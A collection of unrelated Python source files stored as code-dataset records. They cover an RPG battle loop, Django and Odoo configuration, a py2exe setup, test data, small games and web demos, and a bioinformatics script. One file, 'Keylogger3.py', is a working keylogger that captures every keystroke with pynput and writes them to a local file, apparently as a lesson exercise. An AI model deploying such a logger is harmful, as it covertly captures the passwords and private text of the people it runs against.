Person(\"Akeron\", 2900, 200, 190, 35, [fire, blizzard,cure,], [{\"item\": potion,\"quantity\": 3},{\"item\": elixer, \"quantity\": 1},{\"item\": gerenade, \"quantity\": 3}])\nplayer3 = Person(\"Don \", 3500, 400, 270, 250, [bandage,sensubean, thunder, dbeam, forceflash], [{\"item\": bagofbeans, \"quantity\": 1}, {\"item\": teamattack, \"quantity\": 1}])\n\nplayers = [player1, player2, player3]\n\nenemy1 = Person(\"Goony\", 10200, 65, 850, 25, [], [{\"item\": darke, \"quantity\":1}])\nenemy2 = Person(\"Randy\", 3000, 65, 350, 50, [], [{\"item\": darke, \"quantity\":2}])\nenemy3 = Person(\"Jimmy\", 7200, 65, 650, 155, [], [{\"item\": darke, \"quantity\":0}])\n\nenemies = [enemy1, enemy2, enemy3]\n\nrunning = True\ni = 0\n# bcolors endc stop colors\nprint(bcolors.FAIL + bcolors.BOLD + \"***A Gang Attacks!!!!\" + bcolors.ENDC)\n\nwhile running:\n print(\"===============================\\n\")\n for enemy in enemies:\n enemy.get_enemy_stats()\n print(\"\\n\" + bcolors.OKGREEN + bcolors.BOLD + \"\" + bcolors.ENDC)\n\n for player in players:\n if player.get_hp() > 0:\n print(\"\\n\")\n\n player1.get_stats()\n player2.get_stats()\n player3.get_stats()\n print(\"\\n\")\n\n player.choose_action()\n choice = input(\"Choose action:\")\n index = int(choice) - 1\n\n\n if index == 0:\n dmg = player.generate_damage()\n enemy = player.choose_target(enemies)\n enemies[enemy].take_dmg(dmg)\n print(player.name + \" did \", dmg, \" Damage.\\n\" + enemies[enemy].name + \" has\", enemies[enemy].get_hp(), \" HP left!\")\n\n elif index == 1:\n player.choose_magic()\n magic_choice = int(input(\"Choose a Spell:\")) - 1\n\n if magic_choice == -1:\n continue\n\n spell = player.magic[magic_choice]\n magic_dmg = spell.generate_damage()\n\n current_mp = player.get_mp()\n if spell.cost > current_mp:\n print(bcolors.FAIL + \"\\n Not enough MP\\n\" + bcolors.ENDC)\n continue\n player.reduce_mp(spell.cost)\n\n if spell.type == \"white\":\n player.heal(magic_dmg)\n print(bcolors.OKBLUE + \"\\n\" + spell.name + \" heals \" + player.name + \" for \", str(magic_dmg), \" HP.\" + bcolors.ENDC)\n\n elif spell.type == \"black\":\n enemy = player.choose_target(enemies)\n enemies[enemy].take_dmg(magic_dmg)\n print(bcolors.OKBLUE + player.name + \" used \" + spell.name + \"\\n and did\", magic_dmg, \" Damage.\\n\" + enemies[enemy].name + \" has\",\n str(enemies[enemy].get_hp()) + \" hp left!\", bcolors.ENDC)\n elif index == 2:\n player.choose_item()\n item_choice = int(input(\"Choose Item:\")) - 1\n\n if item_choice == -1:\n continue\n item = player.items[item_choice][\"item\"]\n if player.items[item_choice][\"quantity\"] == 0:\n print(bcolors.FAIL + player.name + \"\\n doesnt have any \" + item.name + bcolors.ENDC)\n continue\n\n player.items[item_choice][\"quantity\"] -= 1\n\n\n\n\n if item.type == \"potion\":\n player.heal(item.prop)\n print(bcolors.OKGREEN + \"\\n\" + item.name + \" Heals \" + player.name + \" For \", str(item.prop), \"HP\" + bcolors.ENDC)\n\n elif item.type == \"elixer\":\n if item == dathenny:\n for i in players:\n i.hp = i.maxhp\n i.mp = i.maxmp\n\n print(bcolors.OKGREEN + item.name + \" Fully healed the entire team!\" + bcolors.ENDC)\n\n else:\n player.hp = player.maxhp\n player.mp = player.maxmp\n print(bcolors.OKGREEN + item.name + \" Fully healed \" + player.name + \"!\" +bcolors.ENDC)\n\n\n elif item.type == \"attack\":\n enemy = player.choose_target(enemies)\n enemies[enemy].take_dmg(item.prop)\n print(bcolors.OKGREEN + player.name + \" used \" + item.name + \" and did \", str(item.prop), \" damage to \" + enemies[enemy].name + \"!\" + bcolors.ENDC)\n\n defeated_enemies = 0\n defeated_players = 0\n\n\n for enemy in enemies:\n\n\n if enemy.get_hp() == 0:\n print(bcolors.OKGREEN + bcolors.BOLD + str(enemy.name) + \" is down!\" + bcolors.ENDC)\n del enemy\n defeated_enemies += 1\n if defeated_enemies == 3:\n\n print(bcolors.OKGREEN + bcolors.BOLD + \"YOU WIN!\" + bcolors.ENDC)\n running = False\n else:\n for enemy in enemies:\n enemy.choose_itemx()\n\n item_choice = 0\n if enemy.items[item_choice][\"quantity\"] < 1:\n if enemy.get_hp() > 0:\n enemy_choice = 1\n target = random.randrange(0, 3)\n enemy_dmg = enemy.generate_damage()\n players[target].take_dmg(enemy_dmg)\n print(bcolors.FAIL + bcolors.BOLD + \" \\n\" + enemy.name + \" attacks \" + players[\n target].name + \" for \", enemy_dmg, \" damage!!!!\\n\" + bcolors.ENDC)\n\n\n else:\n if enemy.items[item_choice][\"quantity\"] > 0:\n\n if enemy.get_hp() < enemy.maxhp - 2000:\n print(bcolors.FAIL + enemy.name + \" has Dark Energy around him!\\n\" + \" \\nThe Dark Energy heals \" + enemy.name + \" for 2000hp!\" )\n enemy.heal(2000)\n enemy.items[item_choice][\"quantity\"] -= 1\n\n else:\n if enemy.get_hp() > enemy.maxhp - 2000:\n enemy_choice = 1\n target = random.randrange(0, 3)\n enemy_dmg = enemy.generate_damage()\n players[target].take_dmg(enemy_dmg)\n print(bcolors.FAIL + bcolors.BOLD + \" \\n\" + enemy.name + \" attacks \" +\n players[\n target].name + \" for \", enemy_dmg, \" damage!!!!\\n\" + bcolors.ENDC)\n\n\n\n\n\n\n\n\n for player in players:\n if player.get_hp() == 0:\n print(bcolors.FAIL + bcolors.BOLD + player.name + \" is down!\" + bcolors.ENDC)\n del player\n defeated_players += 1\n\n\n\n if defeated_players == 3:\n print(bcolors.FAIL + bcolors.BOLD + \"Your team has been WIPED OUT!!\\n *****GAME OVER*****\" + bcolors.ENDC)\n running = False\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"49751901","text":"import os\n\n# from django_admin.settings import BASE_DIR\nfrom django.conf import settings\nBASE_DIR = settings.BASE_DIR\n\nprint('filename', BASE_DIR / 'recruitment.admin.log')\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '%(asctime)s %(name)-12s %(lineno)d %(levelname)-8s %(message)s'\n }\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n # 'mail_admins': {\n # 'level': 'ERROR',\n # 'class': 'django.util.log.AdminEmailHandler'\n # },\n 'file': {\n 'class': 'logging.FileHandler',\n 'formatter': 'simple',\n 'filename': BASE_DIR / 'recruitment.admin.log',\n },\n },\n 'root': {\n 'handlers': ['console', 'file'],\n 'level': 'INFO',\n },\n 'loggers': {\n 'myapp': {\n 'handlers': ['console', 'file'],\n 'level': 'DEBUG'\n }\n }\n}\n","sub_path":"python_02_django/02_django_admin/apps/mysettings/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424417134","text":"\n# coding=Big5\n# 如果要使用中文須宣告 coding=Big5\n\"\"\"\nhttp://pythontips.com/2014/03/03/using-py2exe-the-right-way/\nhttps://docs.python.org/3/library/glob.html\n\nerror handle as below:\nhttp://python.6.x6.nabble.com/PyQt-4-7-and-py2exe-error-td1922933.html\n\"\"\"\n\nfrom distutils.core import setup\nimport sys\nimport glob\n\ntry:\n import py2exe\nexcept ImportError:\n print(\"Warning: py2exe not usable\")\n\nVERSION = 'CLONIN'\nAUTHOR = 'Kevin Liao'\n\n\n#this allows to run it with a simple double click.\nsys.argv.append('py2exe')\n\n\"\"\"\npy2exe_options = {\n \"includes\": [\"sip\", \"PyQt4\", \"ui.*\"],\n \"dll_excludes\": [\"MSVCP90.dll\", \"w9xpopen.exe\"],\n \"compressed\": 1,\n \"optimize\": 2,\n \"ascii\": 0,\n \"bundle_files\": 1,\n }\"\"\"\n\nPY2EXE_OPTIONS = {\n \"includes\": [\"sip\", \"PyQt4\", \n # 如下,載入相關 module , 某資料夾底下有 __init__.py , 當程式執行 __import__(Module_Name, ...) 語法可以找到相關 Module_Name\n \"driver.*\",\n \"ui.*\",\n \"ui.tabs.*\",\n \"ui.objects.*\",\n \"ui.widgets.*\",\n \"ui.widgets.plotter.*\",\n \"ui.boxes.*\",\n \"ui.setting.*\",\n \"ui.setting.main.*\"\n ],\n \"dll_excludes\": [\"MSVCP90.dll\", \"w9xpopen.exe\"],\n \"compressed\": 1,\n \"optimize\": 2,\n \"ascii\": 0,\n \"bundle_files\": 1,\n }\n\n\n# DATA_OPTIONS = [(目標資料夾 1 , 來源檔案 1) , (目標資料夾 2 , 來源檔案 2)] \n# glob - Unix style pathname pattern expansion\nDATA_OPTIONS = [ ('lib/configs', glob.glob('lib/configs/*.json')),\n ('lib/image', glob.glob('lib/image/*.gif')),\n ('lib/image', glob.glob('lib/image/*.ico')),\n ('lib/image/blink', glob.glob('lib/image/blink/*.gif')),\n ('lib/image/loading', glob.glob('lib/image/loading/*.gif')),\n ('lib', glob.glob('lib/*.py')),\n ('lib/driver', glob.glob('lib/driver/*.py')),\n ('lib/ui', glob.glob('lib/ui/*.ui')),\n ('lib/ui', glob.glob('lib/ui/*.py')),\n ('lib/ui/boxes', glob.glob('lib/ui/boxes/*.ui')),\n ('lib/ui/boxes', glob.glob('lib/ui/boxes/*.py')),\n ('lib/ui/objects', glob.glob('lib/ui/objects/*.py')),\n ('lib/ui/setting', glob.glob('lib/ui/setting/*.py')),\n ('lib/ui/setting/main', glob.glob('lib/ui/setting/main/*.py')),\n ('lib/ui/tabs', glob.glob('lib/ui/tabs/*.ui')),\n ('lib/ui/tabs', glob.glob('lib/ui/tabs/*.py')),\n ('lib/ui/widgets', glob.glob('lib/ui/widgets/*.ui')),\n ('lib/ui/widgets', glob.glob('lib/ui/widgets/*.py')),\n ('lib/ui/widgets/plotter', glob.glob('lib/ui/widgets/plotter/*.py'))\n\n\n ]\n\n\"\"\"\nDATA_OPTIONS = [('lib', glob.glob('lib/*.py')),\n ('lib/configs', glob.glob('lib/configs/*.json')),\n ('lib/ui', glob.glob('lib/ui/*.py')),\n ('lib/ui', glob.glob('lib/ui/*.ui')),\n ('lib/ui/tabs', glob.glob('lib/ui/tabs/*.py')),\n ('lib/ui/tabs', glob.glob('lib/ui/tabs/*.ui')),\n ('lib/ui/widgets', glob.glob('lib/ui/widgets/*.py')),\n ('lib/ui/widgets', glob.glob('lib/ui/widgets/*.ui')),\n ('lib/ui/boxes', glob.glob('lib/ui/boxes/*.py')),\n ('lib/ui/boxes', glob.glob('lib/ui/boxes/*.ui')),\n ('lib/ui/setting', glob.glob('lib/ui/setting/plotter/*.py')),\n ('lib/ui/setting', glob.glob('lib/ui/setting/main/*.py')),\n ('lib/driver', glob.glob('lib/driver/*.py')),\n ('lib/image', glob.glob('lib/image/*.gif')),\n ('lib/image', glob.glob('lib/image/*.ico'))]\n\"\"\"\n# 編輯時,將會把指定路徑的 *.py 檔案複製到 build 資料夾內\n#PACKAGES = ['ui', 'driver', 'image', 'configs', 'ui.tabs', 'ui.widgets', 'ui.setting.plotter', 'ui.setting.main', 'ui.boxes']\nPACKAGES = ['driver', 'ui', 'ui.boxes', 'ui.objects', 'ui.tabs', 'ui.widgets', 'ui.widgets.plotter', 'ui.setting', 'ui.setting.main']\n\nsetup(\n name = 'client',\n version = VERSION,\n author = AUTHOR,\n zipfile = None,\n data_files = DATA_OPTIONS,\n #windows = [\n # { \n # \"script\" : 'lib/client.py',\n # \"icon_resources\": [(1, \"lib/image/signal.ico\")]\n # }\n # ],\n \n console = [\n { \n \"script\" : 'lib/client.py',\n \"icon_resources\": [(1, \"lib/image/signal.ico\")]\n }\n ],\n package_dir = {'': 'lib'},\n packages = PACKAGES,\n #scripts=['client.py'],\n #console=[{'script' : 'client.py'}],\n options = {'py2exe': PY2EXE_OPTIONS}\n )\n #scripts=['client.py'],\n #console=[ { \n # \"script\" : 'client.py'\n # }\n # ],\n \n # zipfile = None,","sub_path":"example/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533160158","text":"#!/usr/bin/env python\nimport pynput.keyboard\nlog = \"\"\n\n\ndef process_key_press(key):\n global log\n try:\n log = log + str(key.char)\n except AttributeError:\n if key == key.space:\n log = log+\" \"\n else:\n log = log + \" \"+str(key)+\" \"\n if len(log) == 100:\n with open(\"text.txt\", \"a\") as file_key:\n file_key.write(log)\n log = \"\"\n\n\nkeyboard = pynput.keyboard.Listener(on_press=process_key_press)\nwith keyboard:\n keyboard.join()","sub_path":"lesson10/Keylogger3.py","file_name":"Keylogger3.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"218977107","text":"# -*- coding: utf-8; -*-\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom random import randint\nfrom common.date_time import Date, format\nfrom common.string import replace_digit_with_letter\nfrom common.randomize import get_random_spacechar_filled_string as get_spaces\n\n\nvalid_age = datetime.today() - relativedelta(years=30)\ntestdata = [\n # 30 years before today\n Date(format(valid_age), True),\n # 18 years before today\n Date(format(datetime.today() - relativedelta(years=18)), True),\n # 18 years before today + 1 day\n Date(format(datetime.today() - relativedelta(years=18, days=-1)), False),\n # 100 years before today\n Date(format(datetime.today() - relativedelta(years=100)), True),\n # yesterday\n Date(format(datetime.today() - relativedelta(days=1)), False),\n # today\n Date(format(datetime.today()), False),\n # tomorrow\n Date(format(datetime.today() + relativedelta(days=1)), False),\n # 30 years before today with zeros in 'days'\n Date(valid_age.strftime(\"00.%m.%Y\"), False),\n # 30 years before today with zeros in 'month'\n Date(valid_age.strftime(\"%d.00.%Y\"), False),\n # 30 years before today with zeros in 'year'\n Date(valid_age.strftime(\"%d.%m.0000\"), False),\n # 30 years before today with incorrect day\n Date(valid_age.strftime(\"32.%m.%Y\"), False),\n # 30 years before today with incorrect month\n Date(valid_age.strftime(\"%d.13.%Y\"), False),\n # 30 years before today with text characters\n Date(replace_digit_with_letter(format(valid_age)), False),\n # 30 years before today with slashes as separators\n Date(valid_age.strftime(\"%d/%m/%Y\"), False),\n # 30 years before today without separators\n Date(valid_age.strftime(\"%d%m%Y\"), False),\n # 30 years before today with format differrent from \"DD.MM.YYYY\"\n Date(valid_age.strftime(\"%m%d%Y\"), False),\n # 30 years before today with short year\n Date(valid_age.strftime(\"%m%d%y\"), True),\n # data value made of spacechars\n Date(get_spaces(size=randint(1, 10)), False),\n # zero as date value\n Date(\"0\", False),\n # date made of zeros only\n Date(\"00.00.0000\", False),\n # special \"system zero\" date\n Date(\"01.01.1900\", False),\n # upper technology border\n Date(\"99.99.9999\", False),\n]\n","sub_path":"che-test/scripts/autotests/data/osago_date_birth.py","file_name":"osago_date_birth.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"287195465","text":"from turtle import Turtle\n\nFONT = (\"Courier\", 24, \"normal\")\nALIGNMENT = \"center\"\nwith open(\"snake_high_score.txt\", mode=\"r+\") as file:\n HIGH_SCORE = file.read()\n HIGH_SCORE = int(HIGH_SCORE)\n\nclass Scoreboard(Turtle):\n def __init__(self):\n super().__init__()\n self.high_score = HIGH_SCORE\n self.score = 0\n self.color(\"white\")\n self.penup()\n self.goto(0, 260)\n self.hideturtle()\n self.display_score()\n\n def display_score(self):\n self.clear()\n self.write(f\"Score: {self.score} High score: {self.high_score}\", align=ALIGNMENT, font=FONT)\n\n def increase_score(self):\n self.score += 1\n self.write(f\"Score: {self.score}\", align=ALIGNMENT, font=FONT)\n self.display_score()\n\n def reset_score(self):\n if self.score > self.high_score:\n self.high_score = self.score\n with open(\"snake_high_score.txt\", mode=\"w\") as file:\n file.write(f\"{self.high_score}\")\n self.score = 0\n self.display_score()\n\n # def game_over(self):\n # self.goto(0,0)\n # self.write(\"GAME OVER\", align=ALIGNMENT, font=FONT)\n","sub_path":"Day20/snake_scoreboard.py","file_name":"snake_scoreboard.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"177171270","text":"import time\n\nimport redis\nfrom flask import Flask\n\n\napp = Flask(__name__)\ncache = redis.Redis(host='redis', port=80)\n\n\n@app.route('/')\ndef hello():\n return 'Hello World!\\n'\n\nif __name__ == \"__main__\":\n app.run(host=\"192.168.1.15\", debug=True)\n","sub_path":"compose/compose.py","file_name":"compose.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"382928748","text":"from selenium import webdriver\nfrom time import sleep\nfrom secrets import username, pw\n\nclass InstaBot:\n def __init__(self, username, pw):\n self.driver = webdriver.Chrome()\n self.username = username\n self.driver.get(\"https://instagram.com/\")\n sleep(2)\n self.driver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/article/div[2]/div[1]/div/form/div[2]/div/label/input')\\\n .send_keys(username)\n self.driver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/article/div[2]/div[1]/div/form/div[3]/div/label/input')\\\n .send_keys(pw)\n sleep(2)\n self.driver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/article/div[2]/div[1]/div/form/div[4]/button/div')\\\n .click()\n sleep(3)\n self.driver.find_element_by_xpath('/html/body/div[4]/div/div/div[3]/button[2]')\\\n .click()\n sleep(2)\n\nmy_bot = InstaBot(username, pw)","sub_path":"insta.py","file_name":"insta.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"177592406","text":"\"\"\"This simple CRUD application performs the following operations sequentially:\n 1. Initializes a SQL database and table, using the cockroach sql CLI and a .sql file.\n 2. Creates 100 new accounts with randomly generated IDs and randomly-computed balance amounts.\n 3. Chooses two accounts at random and takes half of the money from the first and deposits it\n into the second.\n 4. Chooses five accounts at random and deletes them.\n\"\"\"\n\nimport random\nfrom math import floor\nimport uuid\nimport os\nfrom sqlalchemy_cockroachdb import run_transaction\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom models import Account\n\n# The code below inserts new accounts.\n\n\ndef create_accounts(session, num):\n \"\"\"Create N new accounts with random account IDs and account balances.\n \"\"\"\n print(\"Creating new accounts...\")\n new_accounts = []\n while num > 0:\n account_id = uuid.uuid4()\n account_balance = floor(random.random()*1_000_000)\n new_accounts.append(Account(id=account_id, balance=account_balance))\n seen_account_ids.append(account_id)\n print(\"Created new account with id {0} and balance {1}.\".format(\n account_id, account_balance))\n num = num - 1\n session.add_all(new_accounts)\n\n\ndef transfer_funds_randomly(session, one, two):\n \"\"\"Transfer money between two accounts.\n \"\"\"\n source = session.query(Account).filter(Account.id == one).first()\n dest = session.query(Account).filter(Account.id == two).first()\n print(\"Random account balances:\\nAccount {0}: {1}\\nAccount {2}: {3}\".format(\n one, source.balance, two, dest.balance))\n\n amount = floor(source.balance/2)\n print(\"Transferring {0} from account {1} to account {2}...\".format(\n amount, one, two))\n\n # Check balance of the first account.\n if source.balance < amount:\n raise \"Insufficient funds in account {0}\".format(one)\n else:\n source.balance -= amount\n dest.balance += amount\n\n print(\"Transfer complete.\\nNew balances:\\nAccount {0}: {1}\\nAccount {2}: {3}\".format(\n one, source.balance, two, dest.balance))\n\n\ndef delete_accounts(session, num):\n \"\"\"Delete N existing accounts, at random.\n \"\"\"\n print(\"Deleting existing accounts...\")\n delete_ids = []\n while num > 0:\n delete_id = random.choice(seen_account_ids)\n delete_ids.append(delete_id)\n seen_account_ids.remove(delete_id)\n num = num - 1\n\n accounts = session.query(Account).filter(Account.id.in_(delete_ids)).all()\n\n for account in accounts:\n print(\"Deleted account {0}.\".format(account.id))\n session.delete(account)\n\n# Run the transfer inside a transaction.\n\n\nif __name__ == '__main__':\n\n conn_string = input('Enter your node\\'s connection string:\\n')\n # For cockroach demo:\n # postgres://demo:@127.0.0.1:26257?sslmode=require\n # For CockroachCloud:\n # postgres://:@:26257/.defaultdb?sslmode=verify-full&sslrootcert=/\n try:\n db_uri = os.path.expandvars(conn_string)\n\n print(\"Initializing the bank database...\")\n os.system('cockroach sql --url \\'{0}\\' -f dbinit.sql'.format(db_uri))\n print(\"Database initialized.\")\n\n psycopg_uri = db_uri.replace(\n 'postgres', 'cockroachdb').replace('26257?', '26257/bank?')\n # The \"cockroachdb://\" prefix for the engine URL indicates that we are\n # connecting to CockroachDB using the 'cockroachdb' dialect.\n # For more information, see\n # https://github.com/cockroachdb/sqlalchemy-cockroachdb.\n engine = create_engine(psycopg_uri)\n except Exception as e:\n print('Failed to connect to database.')\n print('{0}'.format(e))\n\n seen_account_ids = []\n\n run_transaction(sessionmaker(bind=engine),\n lambda s: create_accounts(s, 100))\n\n from_id = random.choice(seen_account_ids)\n to_id = random.choice([id for id in seen_account_ids if id != from_id])\n\n run_transaction(sessionmaker(bind=engine),\n lambda s: transfer_funds_randomly(s, from_id, to_id))\n\n run_transaction(sessionmaker(bind=engine), lambda s: delete_accounts(s, 5))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"88375007","text":"from odoo import api, fields, models\n\n\nclass VisitRecord(models.Model):\n _name = 'crm.record'\n _description = 'CRM Record'\n _inherit = ['crm.application']\n\n visit_time = fields.Date('拜访时间')\n communication_matter = fields.Char('沟通事项')\n leave_question = fields.Char('遗留问题')\n\n customer_response = fields.Selection(\n [('3', '非常满意'), ('2', '满意'), ('1', '一般'), ('0', '不满意')], '满意度'\n )\n customer_question = fields.Char('客户疑问')\n unsolved_problem = fields.Char('待解决问题')\n\n updated_version = fields.Char('方案更行')\n visit_way = fields.Selection([('0', '面谈'), ('1', '电话')], '拜访方式')\n upgrade_problem = fields.Char('升级问题')\n grade = fields.Selection([('A', '优秀'), ('B', '良好'), ('C', '有待提高')], '评分')\n\n @api.model\n def _default_stage(self):\n Stage = self.env['crm.record.stage']\n return Stage.search([], limit=1)\n\n @api.model\n def _group_expand_stage_id(self, stage, domain, order):\n return stage.search([], order=order)\n\n stage_id = fields.Many2one(\n 'crm.record.stage',\n default=_default_stage,\n group_expand='_group_expand_stage_id')\n\n state = fields.Selection(related='stage_id.state')\n","sub_path":"custom-addons/crm_activity/models/crm_record.py","file_name":"crm_record.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"267081018","text":"# encoding: utf-8\nfrom django import forms\nfrom django.db import models\nfrom apps.core.models import Menus\nfrom apps.core.widgets import CheckWidget\n\n\n\ndef make_custom_field(f):\n formfield = f.formfield()\n if isinstance(f, models.CharField):\n formfield.widget.attrs.update({'class': 'form-control'})\n return formfield\n\n\nclass BaseForm(forms.ModelForm):\n field_map = []#form排列顺序 [[\"name\",\"url\"],[\"icon\",\"active\"]]\n row_html = u\"
    {0}
    \"\n field_html = u\"
    {1}{2}
    \"\n label_html = u\"\"\n widget_html = u\"
    {0}
    \"\n\n def as_bootstrap(self):\n result = \"\"\n for row in self.field_map:\n col_length = 12 / len(row) if len(row) > 0 else 12\n rowdata = \"\"\n for col in row:\n if col in self.fields.keys():\n field = self.fields[col]\n if isinstance(field.widget, forms.TextInput):\n label = self.label_html.format(col,field.label)\n widget = self.widget_html.format(self[col])\n f = self.field_html.format(col_length,label,widget)\n elif isinstance(field.widget, CheckWidget):\n f = self.field_html.format(col_length, self[col], \"\")\n rowdata += f\n result += self.row_html.format(rowdata)\n return result\n\n\nclass MenuForm(BaseForm):\n formfield_callback = make_custom_field\n field_map = [[\"name\",\"url\"],\n [\"icon\",\"active\"]]\n\n active = forms.CharField(widget=CheckWidget(label=u\"是否激活\"))\n class Meta:\n model = Menus\n fields = ('name','url','icon','active')","sub_path":"apps/core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"239441853","text":"# -*- coding: utf-8 -*-\n'''\nfrom IMGT res's SEQUENCE ID,\nadd information to the file using Original CSV file.\n\nUSAGE\n==========================================\npython this\n\n\n'''\nimport pprint\nimport csv\nimport sys\nsys.path.append('../Modules/Germline')\nimport re\nimport multiprocessing\nfrom germline import Germline\n\ndef make_dict_sub(file_path):\n\tdata = []\n\twith open(file_path) as fi:\n\t\treader = csv.reader(fi, delimiter=',')\n\t\treader.next()\n\t\tfor d in reader:\n\t\t\tdata.append(d)\n\treturn (file_path, data)\n\ndef make_dict(file_paths):\n\tp = multiprocessing.Pool(20)\n\t'''\n\targs :\n\t\tstring list\n\treturns :\n\t\tdict{\n\t\t\tstring(file path) : [csv data])\n\t\t}\n\t'''\n\n\tres = p.map(make_dict_sub, file_paths)\n\n\tdict_res = {}\n\tfor (file_path, data) in res:\n\t\tdict_res[file_path] = data\n\treturn dict_res\n\ndef fetch_path(file_name, file_paths):\n\tfor file_path in file_paths:\n\t\tif file_name in file_path:\n\t\t\treturn file_path\n\treturn file_name\n\ndef fetch_original_data(sequence_id, dict, file_paths):\n\telms = sequence_id.split('|')\n\tfile_name = elms[0]\n\tdata_idx = int(elms[2]) if len(elms) == 3 else int(elms[1])\n\tfile_path = fetch_path(file_name, file_paths)\n\treturn dict[file_path][data_idx]\n\ndef make_output(sequence_id, d, nb_of_mutation, dict_germline_v, dict_germline_j):\n\t'''\n\tcsv FORMAT : :\n\tCDR3(pep),V,VRefBegin,VRefEnd,VReadBegin,VReadEnd,D,DRefBegin,DRefEnd,DReadBegin,DReadEnd,J,JRefBegin,JRefEnd,JReadBegin,JReadEnd,C,CRefBegin,CRefEnd,CReadBegin,CReadEnd,joinedSeq,CDR3(nuc),copy\n\t24column\n\tor\n\tARTTSTVAPFDS,hIGHV2-26,*01(46-298)(0-252),hIGHD1-1,*01(4-10)(258-264),hIGHJ4,*02(4-48)(271-315),hIGHA2,*04(0-35)(315-350),agaccctcacgctgacccacaccgtctcggggttctccctcagcaatccgagaatgggtgtgagctggatCCGCCAGCCCCCGGGGAAGGCCCTGGAGTGGCTTGCACACATTATGTCGATTGACGAAATCTCGTACAGCACATCtctgaggagccggctcaccatctccaaggacacctccagaaaccaagttgtcctttccatgaccaacatggaccctgtggacacagccacctattactgtgcgcggacaacctcaactgtggccccctttgactcctggggccagggcaccctggtcaccgtctcctcagcatccccgaccagccccaaggtcttcccgctgagc,gcgcggacaacctcaactgtggccccctttgactcc,1\n\t12column\n\n\toutput\n\t=====================\n\t1.サンプルID\n\t2.CDR3のアミノ酸配列\n\t3.リード数\n\t4.ミスマッチ数(IMGTが計算)\n\t5.readの全長\n\t6.germlineのV\n\t7.germlineのVの配列\n\t8.germlineのJ\n\t9.germlineのJの配列\n\t=============================\n\t'''\n\tif len(d) == 24:\n\t\tsample_id = sequence_id.split('|')[0]\n\t\taa = d[0]\n\t\tread_cnt = d[-1]\n\t\tread_len = str(len(d[-3]))\n\t\tv_gene_name = d[1]\n\t\tv_region = dict_germline_v.get(v_gene_name[1:], '*')\n\t\tj_gene_name = d[11]\n\t\tj_region = dict_germline_j.get(j_gene_name[1:], '*')\n\t\tread = d[-3]\n\telif len(d) == 12:\n\t\tsample_id = sequence_id.split('|')[0]\n\t\taa = d[0]\n\t\tread_cnt = d[-1]\n\t\tread_len = str(len(d[-3]))\n\t\tv_gene_name = d[1] + d[2][0:3]\n\t\tv_region = dict_germline_v.get(v_gene_name[1:], '*')\n\t\tj_gene_name = d[5] + d[6][0:3]\n\t\tj_region = dict_germline_j.get(j_gene_name[1:], '*')\n\t\tread = d[-3]\n\telse:\n\t\tprint(d)\n\t\texit(1)\n\toutput = sample_id + '\\t' + aa + '\\t' + read_cnt + '\\t' + nb_of_mutation + '\\t' + read_len + '\\t' + v_gene_name + '\\t' + v_region + '\\t' + j_gene_name + '\\t' + j_region + '\\t' + read + '\\n'\n\treturn output\n\nif __name__ == '__main__':\n\ttsv_name_IgH = './input_IgH.txt'\n\ttsv_name_IgK = './input_IgK.txt'\n\tfile_paths = []\n\twith open(tsv_name_IgK) as tsv_IgK:\n\t\treader = csv.reader(tsv_IgK, delimiter='\\t')\n\t\tfor d in reader:\n\t\t\tif len(d) > 0 and 'csv' in d[0]:\n\t\t\t\tfile_paths.append(d[0])\n\twith open(tsv_name_IgH) as tsv_IgH:\n\t\treader = csv.reader(tsv_IgH, delimiter='\\t')\n\t\treader.next()\n\t\tfor d in reader:\n\t\t\tif len(d) > 0 and 'csv' in d[0]:\n\t\t\t\tfile_paths.append(d[0])\n\n\t'''\n\tremove the repetition in file_paths\n\t'''\n\tfile_paths = list(set(file_paths))\n\tpprint.pprint(file_paths)\n\n\t'''\n\tmake {filepath : data} dictionary\n\t'''\n\tdict = make_dict(file_paths)\n\n\timgt_res_IgH_name = './data/IgH_top1/8_V-REGION-nt-mutation-statistics.txt'\n\t#imgt_res_IgH_name = './data/IgH_head30_cut/8_V-REGION-nt-mutation-statistics.txt.test'\n\timgt_res_IgK_name = './data/IgK_maxread/8_V-REGION-nt-mutation-statistics.txt'\n\n\tdict_germlines_IGHV = Germline.get_germline_dict(Germline.get_germlines('IGHV'))\n\tdict_germlines_IGHJ = Germline.get_germline_dict(Germline.get_germlines('IGHJ'))\n\tdict_germlines_IGKV = Germline.get_germline_dict(Germline.get_germlines('IGKV'))\n\tdict_germlines_IGKJ = 